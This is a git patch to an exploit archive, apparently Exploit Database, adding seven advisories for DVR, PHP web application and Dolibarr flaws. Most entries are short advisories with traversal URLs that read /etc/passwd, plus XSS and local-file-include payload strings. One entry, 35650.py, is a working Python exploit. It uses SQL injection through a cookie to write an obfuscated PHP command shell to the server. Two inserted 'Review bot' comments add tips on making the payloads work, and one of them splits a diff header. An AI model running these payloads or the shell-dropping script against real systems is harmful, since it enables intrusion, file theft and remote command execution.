From 5ab0a9cb63b671061838597339dd375cbb757603 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 30 Dec 2014 08:37:44 +0000 Subject: [PATCH] Update: 2014-12-30 7 new exploits --- files.csv | 9 +++- platforms/android/remote/35637.py | 3 ++ platforms/linux/remote/35644.txt | 10 ++++ platforms/php/webapps/35645.txt | 9 ++++ platforms/php/webapps/35647.txt | 9 ++++ platforms/php/webapps/35648.txt | 11 ++++ platforms/php/webapps/35649.txt | 9 ++++ platforms/php/webapps/35650.py | 84 +++++++++++++++++++++++++++++++ platforms/php/webapps/35651.txt | 13 +++++ 9 files changed, 156 insertions(+), 1 deletion(-) create mode 100755 platforms/linux/remote/35644.txt create mode 100755 platforms/php/webapps/35645.txt create mode 100755 platforms/php/webapps/35647.txt create mode 100755 platforms/php/webapps/35648.txt create mode 100755 platforms/php/webapps/35649.txt create mode 100755 platforms/php/webapps/35650.py create mode 100755 platforms/php/webapps/35651.txt
diff --git a/files.csv b/files.csv
index cc051b1f3..51b246ff7 100755
--- a/files.csv
+++ b/files.csv
@@ -8,7 +8,7 @@ id,file,description,date,author,platform,type,port
 7,platforms/linux/remote/7.pl,"Samba 2.2.x - Remote Root Buffer Overflow Exploit",2003-04-07,"H D Moore",linux,remote,139
 8,platforms/linux/remote/8.c,"SETI@home Clients - Buffer Overflow Exploit",2003-04-08,zillion,linux,remote,0
 9,platforms/windows/dos/9.c,"Apache HTTP Server 2.x Memory Leak Exploit",2003-04-09,"Matthew Murphy",windows,dos,0
-10,platforms/linux/remote/10.c,"Samba 2.2.8 - Remote Root Exploit",2003-04-10,eSDee,linux,remote,139
+10,platforms/linux/remote/10.c,"Samba <= 2.2.8 - Remote Root Exploit",2003-04-10,eSDee,linux,remote,139
 11,platforms/linux/dos/11.c,"Apache <= 2.0.44 Linux - Remote Denial of Service Exploit",2003-04-11,"Daniel Nystram",linux,dos,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Local Root Exploit",2003-04-14,KuRaK,linux,local,0
 13,platforms/windows/dos/13.c,"Chindi Server 1.0 - Denial of Service Exploit",2003-04-18,"Luca Ercoli",windows,dos,0
@@ -32106,3 +32106,10 @@ id,file,description,date,author,platform,type,port
 35641,platforms/multiple/remote/35641.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC /jde/MafletClose.mafService RENDER_MAFLET Parameter XSS",2011-04-19,"Juan Manuel Garcia",multiple,remote,0
 35642,platforms/multiple/remote/35642.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC /jde/JASMafletMafBrowserClose.mafService jdemafjasLinkTarget Parameter XSS",2011-04-19,"Juan Manuel Garcia",multiple,remote,0
 35643,platforms/php/webapps/35643.txt,"webSPELL 4.2.2a Multiple Cross-Site Scripting Vulnerabilities",2011-04-19,"High-Tech Bridge SA",php,webapps,0
+35644,platforms/linux/remote/35644.txt,"Viola DVR VIO-4/1000 Multiple Directory Traversal Vulnerabilities",2011-04-19,QSecure,linux,remote,0
+35645,platforms/php/webapps/35645.txt,"Automagick Tube Script 1.4.4 'module' Parameter Cross Site Scripting Vulnerability",2011-04-20,Kurd-Team,php,webapps,0
+35647,platforms/php/webapps/35647.txt,"SyCtel Design 'menu' Parameter Multiple Local File Include Vulnerabilities",2011-04-21,"Ashiyane Digital Security Team",php,webapps,0
+35648,platforms/php/webapps/35648.txt,"Zenphoto 1.4.0.3 '_zp_themeroot' Parameter Multiple Cross Site Scripting Vulnerabilities",2011-04-21,"High-Tech Bridge SA",php,webapps,0
+35649,platforms/php/webapps/35649.txt,"todoyu 2.0.8 'lang' Parameter Cross Site Scripting Vulnerability",2011-04-22,"AutoSec Tools",php,webapps,0
+35650,platforms/php/webapps/35650.py,"LightNEasy 3.2.3 'userhandle' Cookie Parameter SQL Injection Vulnerability",2011-04-21,"AutoSec Tools",php,webapps,0
+35651,platforms/php/webapps/35651.txt,"Dolibarr 3.0 Local File Include and Cross Site Scripting Vulnerabilities",2011-04-22,"AutoSec Tools",php,webapps,0
diff --git a/platforms/android/remote/35637.py b/platforms/android/remote/35637.py
index c29493c6e..6cda8fd77 100755
--- a/platforms/android/remote/35637.py
+++ b/platforms/android/remote/35637.py
@@ -1,3 +1,6 @@
+# Mirror: http://pastebin.com/raw.php?i=CZChGAnG
+# Video: https://www.youtube.com/watch?v=V7bnLOohqqI
+
 #!/usr/bin/python
 #-*- coding: utf-8 -*
diff --git a/platforms/linux/remote/35644.txt b/platforms/linux/remote/35644.txt
new file mode 100755
index 000000000..255838138
--- /dev/null
+++ b/platforms/linux/remote/35644.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/47509/info
+
+Viola DVR is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting the issues can allow an attacker to obtain sensitive information that could aid in further attacks.
+
+Viola DVR VIO-4/1000 is vulnerable; other products may also be affected.
+
+http://www.example.com/cgi-bin/wappwd?FILEFAIL=../../../etc/passwd
+http://www.example.com/cgi-bin/wapopen?FILECAMERA=../../../etc/passwd
\ No newline at end of file
diff --git a/platforms/php/webapps/35645.txt b/platforms/php/webapps/35645.txt
new file mode 100755
index 000000000..0bc8a9eb8
--- /dev/null
+++ b/platforms/php/webapps/35645.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47519/info
+
+Automagick Tube Script is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Automagick Tube Script 1.4.4 is vulnerable; other versions may also be affected.
+
+http://www.example.com/index.php?module=
\ No newline at end of file
diff --git a/platforms/php/webapps/35647.txt b/platforms/php/webapps/35647.txt
new file mode 100755
index 000000000..90aae918a
--- /dev/null
+++ b/platforms/php/webapps/35647.txt
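Review bot: The PoC line `http://www.example.com/index.php?module=` in 35645.txt carries no payload after `module=`, so as stored the entry does not demonstrate the reflected XSS it describes; the vector was presumably lost when the SecurityFocus text was mirrored and should be restored from the original advisory (bid 47519) rather than reconstructed here. Until it is, a one-line note after the URL such as `[payload omitted in source — see original advisory]` would stop readers from treating an empty parameter as the trigger.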
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47526/info
+
+SyCtel Design is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+
+http://www.example.com/index.php?menu=../../../proc/self/environ
+http://www.example.com/index1.php?menu=../../../etc/passwd
\ No newline at end of file
diff --git a/platforms/php/webapps/35648.txt b/platforms/php/webapps/35648.txt
new file mode 100755
index 000000000..dbd2d615e
--- /dev/null
+++ b/platforms/php/webapps/35648.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/47528/info
+
+Zenphoto is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Zenphoto 1.4.0.3 is vulnerable; other versions may also be affected.
+
+http://www.example.com/themes/zenpage/slideshow.php?_zp_themeroot=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E
+
+http://www.example.com/themes/stopdesign/comment_form.php?_zp_themeroot=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/35649.txt b/platforms/php/webapps/35649.txt
new file mode 100755
index 000000000..be3ebc212
--- /dev/null
+++ b/platforms/php/webapps/35649.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47540/info
+
+todoyu is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+todoyu 2.0.8 is vulnerable; other versions may also be affected.
+
+http://www.example.com/todoyu/lib/js/jscalendar/php/test.php?lang=%22%3E%3C/script%3E%3Cscript%3Ealert%280%29%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/35650.py b/platforms/php/webapps/35650.py
new file mode 100755
index 000000000..d93eccdf4
--- /dev/null
+++ b/platforms/php/webapps/35650.py
@@ -0,0 +1,84 @@
+source: http://www.securityfocus.com/bid/47541/info
+
+LightNEasy is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+LightNEasy 3.2.3 is vulnerable; other versions may also be affected.
+
+# ------------------------------------------------------------------------
+# Software................LightNEasy 3.2.3
+# Vulnerability...........SQL Injection
+# Threat Level............Critical (4/5)
+# Download................http://www.lightneasy.org/
+# Discovery Date..........4/21/2011
+# Tested On...............Windows Vista + XAMPP
+# ------------------------------------------------------------------------
+# Author..................AutoSec Tools
+# Site....................http://www.autosectools.com/
+# Email...................John Leitch
+# ------------------------------------------------------------------------
+#
+#
+# --Description--
+#
+# A SQL injection vulnerability in LightNEasy 3.2.3 can be exploited to
+# extract arbitrary data. In some environments it may be possible to
+# create a PHP shell.
+# +# +# --PoC-- + +import socket + +host = 'localhost' +path = '/lne323' +shell_path = '/shell.php' +port = 80 + +def upload_shell(): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((host, port)) + s.settimeout(8) + + s.send('POST ' + path + '/index.php?do=&page= HTTP/1.1\r\n' + 'Host: localhost\r\n' + 'Proxy-Connection: keep-alive\r\n' + 'User-Agent: x\r\n' + 'Content-Length: 73\r\n' + 'Cache-Control: max-age=0\r\n' + 'Origin: null\r\n' + 'Content-Type: multipart/form-data; boundary=----x\r\n' + 'Cookie: userhandle=%22UNION/**/SELECT/**/CONCAT(char(60),char(63),char(112),char(104),char(112),char(32),char(115),char(121),char(115),char(116),char(101),char(109),char(40),char(36),char(95),char(71),char(69),char(84),char(91),char(39),char(67),char(77),char(68),char(39),char(93),char(41),char(59),char(32),char(63),char(62)),%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22/**/FROM/**/dual/**/INTO/**/OUTFILE%22../../htdocs/shell.php%22%23\r\n' + 'Accept: text/html\r\n' + 'Accept-Language: en-US,en;q=0.8\r\n' + 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n' + '\r\n' + '------x\r\n' + 'Content-Disposition: form-data; name="submit"\r\n' + '\r\n' + '\r\n' + '------x--\r\n' + '\r\n') + + resp = s.recv(8192) + + http_ok = 'HTTP/1.1 200 OK' + + if http_ok not in resp[:len(http_ok)]: + print 'error uploading shell' + return + else: print 'shell uploaded' + + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((host, port)) + s.settimeout(8) + + s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\ + 'Host: ' + host + '\r\n\r\n') + + if http_ok not in s.recv(8192)[:len(http_ok)]: print 'shell not found' + else: print 'shell located at http://' + host + shell_path + +upload_shell() + diff --git a/platforms/php/webapps/35651.txt b/platforms/php/webapps/35651.txt new file mode 100755 index 000000000..c448ee9fc --- /dev/null +++ b/platforms/php/webapps/35651.txt 
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/47542/info
+
+Dolibarr is prone to a local file-include vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute local files within the context of the affected application. Information harvested may aid in further attacks.
+
+The attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Dolibarr 3.0.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/dolibarr-3.0.0/htdocs/document.php?lang=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E
+
+http://www.example.com/dolibarr-3.0.0/htdocs/user/passwordforgotten.php?theme=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
\ No newline at end of file
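Review bot: The LFI PoC on the last line depends on the trailing `%00` to cut the `theme` value short of whatever suffix the application presumably appends, and PHP's filesystem functions reject embedded null bytes from 5.3.4 onward, so the entry should state that limit, e.g. `# null-byte truncation: only effective on PHP < 5.3.4`. The eight `..%2f` hops to `windows%2fwin.ini` also tie the example to a Windows install at one specific depth; a sentence noting that a Linux target needs a different depth and file would save readers from reporting a non-vulnerable result, especially since files.csv records the platform as php/webapps, not windows.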